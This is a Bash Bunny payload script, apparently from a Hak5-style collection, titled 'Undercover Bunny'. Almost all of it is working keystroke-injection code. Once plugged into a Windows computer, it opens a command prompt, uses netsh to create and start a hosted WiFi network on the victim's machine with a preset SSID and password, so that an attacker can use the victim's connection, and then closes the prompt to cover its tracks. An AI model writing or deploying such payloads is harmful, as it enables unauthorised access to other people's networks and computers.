
 
# Title: Undercover Bunny (it sounds cool)
# Description: Creates a WiFi network that piggyback's off of the victim's current connection using CMD
# Author: hkessel1
# Version: 1.0
# Category: General?
# Target: Windows 10 and most likely 7 (CMD)
# Attackmodes: HID

----------------------------------------
                 LEDS
Magenta solid = setting up 
White fast = cleaning up
Green 1000ms VERYFAST blink followed by SOLID = you have completed the mission
----------------------------------------
 
################## Options ###################                                                                        
# Bash Bunny name
bbname=BashBunny                                                                           
                                     
# Access point name                                  
apname=yummy_bunny
                                     
# Access point password                                                      
password=hak5bunny
 
# Millaseconds to clean up (and stpo) script after "Start network" is executed (+0.250 seconds)
xeject=120000
 
 
################## Options ####################
 
 
 
# Start network
ATTACKMODE HID
LED SETUP
Q GUI r
Q DELAY 200
Q STRING cmd.exe
Q DELAY 100
Q ENTER
Q DELAY 100
Q STRING netsh wlan set hostednetwork mode=allow ssid=$apname key=$password
Q DELAY 200
Q ENTER
Q DELAY 100
Q STRING netsh wlan start hostednetwork
Q DELAY 150
Q ENTER
 
 
# Begin cleanup
LED CLEANUP
Q GUI r
Q DELAY 100
Q STRING cmd.exe
Q DELAY 100
Q ENTER
Q DELAY $xeject
Q ENTER
Q DELAY 100
Q ENTER
Q DELAY 100
Q STRING taskkill /IM cmd.exe
Q DELAY 50
Q ENTER
 
 
 
 
LED FINISH
